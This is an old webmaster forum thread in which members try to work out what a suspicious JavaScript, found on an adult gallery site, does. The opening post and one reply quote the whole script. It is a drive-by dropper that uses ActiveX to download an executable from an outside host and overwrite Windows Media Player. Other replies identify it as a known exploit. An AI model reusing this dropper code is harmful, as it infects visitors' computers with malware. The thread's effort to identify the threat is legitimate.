What does this script do exactly?

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • FreeOnes
    Confirmed User
    • Jul 2001
    • 3406

    #1

    What does this script do exactly?

    http://traffic.hitscounter.biz/count65/ss.js.php

    wmplayerpaths= [ "C:\\Programmer\\Windows Media Player\\wmplayer.exe", "D:\\Programmer\\Windows Media Player\\wmplayer.exe", "C:\\Program\\Windows Media Player\\wmplayer.exe", "D:\\Program\\Windows Media Player\\wmplayer.exe", "C:\\Programme\\Windows Media Player\\wmplayer.exe", "D:\\Programme\\Windows Media Player\\wmplayer.exe", "C:\\Programmi\\Windows Media Player\\wmplayer.exe", "D:\\Programmi\\Windows Media Player\\wmplayer.exe", "C:\\Programfiler\\Windows Media Player\\wmplayer.exe", "D:\\Programfiler\\Windows Media Player\\wmplayer.exe", "C:\\Programas\\Windows Media Player\\wmplayer.exe", "D:\\Programas\\Windows Media Player\\wmplayer.exe", "C:\\Archivos de Programa\\Windows Media Player\\wmplayer.exe", "D:\\Archivos de Programa\\Windows Media Player\\wmplayer.exe", "D:\\Program Files\\Windows Media Player\\wmplayer.exe", "C:\\Program Files\\Windows Media Player\\wmplayer.exe" ]; function IfExists(path) { try { var r = 1; var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; shahahahahaha(); s.LoadFromFile(path); } catch (e) { return 0; } return 1; } try { for (i=0;i<wmplayerpaths.length;i++) { wmplayerpath = wmplayerpaths[i]; if (IfExists(wmplayerpath)) break; } var x = new ActiveXObject("Microsoft.XMLHTTP"); xhahahahahaha("GET", "http://download.hitscounter.biz/count65/test.exe",0); x.Send(); var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; shahahahahaha(); s.Write(x.responseBody); s.SaveToFile(wmplayerpath,2); location.href = "mms://"; } catch(e) { }



    VBS/Psyme:http://us.mcafee.com/virusInfo/defau...virus_k=100749

    thanks for your help

    The new FreeOnes! - AdultFilmStarContent - BabeGalleries and much more! - 1Strike Movies and much more! All powered by Xpressa
  • Jace
    FBOP Class Of 2013
    • Jan 2004
    • 35562

    #2
    it appears to be trying to find windows media player and then streaming something

    Comment

    • grumpy
      Too lazy to set a custom title
      • Jan 2002
      • 9870

      #3
      tests in several languages if the windows media player is installed
      ( or at least at the hardddisk )
      then loads an test.exe and looks likes it replaces the media player or links to it.
      Last edited by grumpy; 07-12-2004, 03:35 PM.
      Don't let greediness blur your vision | You gotta let some shit slide
      icq - 441-456-888

      Comment

      • grumpy
        Too lazy to set a custom title
        • Jan 2002
        • 9870

        #4
        put the sript here as a text link...then we can read all the ahahaa shit
        Don't let greediness blur your vision | You gotta let some shit slide
        icq - 441-456-888

        Comment

        • zanycash Pete
          Confirmed User
          • Jun 2004
          • 1023

          #5
          See's what version of WMP is on your system??

          $45 Per Join or 60/40 Rev Share!
          New Fresh Hosted Galleries And High Quality/Converting Sites!
          Free Hosting, Free Content, Awsome Free Hosted Gallery Generator!
          ICQ#249-429-941

          Comment

          • FreeOnes
            Confirmed User
            • Jul 2001
            • 3406

            #6
            Originally posted by grumpy
            put the sript here as a text link...then we can read all the ahahaa shit
            it loads from this page via an IFRAME
            http://www.babes-club.com/jelena_foot/01.html

            The new FreeOnes! - AdultFilmStarContent - BabeGalleries and much more! - 1Strike Movies and much more! All powered by Xpressa

            Comment

            • grumpy
              Too lazy to set a custom title
              • Jan 2002
              • 9870

              #7
              no iframe in that page
              Well not for me.
              Don't let greediness blur your vision | You gotta let some shit slide
              icq - 441-456-888

              Comment

              • Robertf
                Confirmed User
                • Feb 2004
                • 392

                #8
                beh i had that once :-/ a version of it ...

                It replaces a windows media player file .. then copies a file to your %windows% folder ... makes sure it starts up when your computer starts ... and that you can't delete it (easely)

                After that came into my comp ... 90% of the links on my own webpage .. went somewhere else ( thanks to that i knew directly i had something in my comp)

                ....

                Comment

                • sandman!
                  Icq: 14420613
                  • Mar 2001
                  • 15431

                  #9
                  Originally posted by FreeOnes
                  http://traffic.hitscounter.biz/count65/ss.js.php

                  wmplayerpaths= [ "C:\\Programmer\\Windows Media Player\\wmplayer.exe", "D:\\Programmer\\Windows Media Player\\wmplayer.exe", "C:\\Program\\Windows Media Player\\wmplayer.exe", "D:\\Program\\Windows Media Player\\wmplayer.exe", "C:\\Programme\\Windows Media Player\\wmplayer.exe", "D:\\Programme\\Windows Media Player\\wmplayer.exe", "C:\\Programmi\\Windows Media Player\\wmplayer.exe", "D:\\Programmi\\Windows Media Player\\wmplayer.exe", "C:\\Programfiler\\Windows Media Player\\wmplayer.exe", "D:\\Programfiler\\Windows Media Player\\wmplayer.exe", "C:\\Programas\\Windows Media Player\\wmplayer.exe", "D:\\Programas\\Windows Media Player\\wmplayer.exe", "C:\\Archivos de Programa\\Windows Media Player\\wmplayer.exe", "D:\\Archivos de Programa\\Windows Media Player\\wmplayer.exe", "D:\\Program Files\\Windows Media Player\\wmplayer.exe", "C:\\Program Files\\Windows Media Player\\wmplayer.exe" ]; function IfExists(path) { try { var r = 1; var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; shahahahahaha(); s.LoadFromFile(path); } catch (e) { return 0; } return 1; } try { for (i=0;i<wmplayerpaths.length;i++) { wmplayerpath = wmplayerpaths[i]; if (IfExists(wmplayerpath)) break; } var x = new ActiveXObject("Microsoft.XMLHTTP"); xhahahahahaha("GET", "http://download.hitscounter.biz/count65/test.exe",0); x.Send(); var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; shahahahahaha(); s.Write(x.responseBody); s.SaveToFile(wmplayerpath,2); location.href = "mms://"; } catch(e) { }



                  VBS/Psyme:http://us.mcafee.com/virusInfo/defau...virus_k=100749

                  thanks for your help

                  Its an exploit if its a gallery submitted delete it if its a trade you might want to delete it.

                  Its an old exploit also not many people still use it.
                  Need WebHosting ? Email me for some great deals [email protected]

                  Comment

                  • Nasty
                    Confirmed User
                    • Aug 2002
                    • 1575

                    #10
                    I dont get an iframe on that page but I see its another one of those http://yourownfreehost.com/ sites, a lot of funky shit seems to be coming up on those sites

                    “Ours is a world of nuclear giants and ethical infants. We know more about war than we know about peace, more about killing than we know about living. If we continue to develop our technology without wisdom or prudence, our servant may prove to be our executioner.” ― Omar Bradley (1948)

                    Comment

                    Working...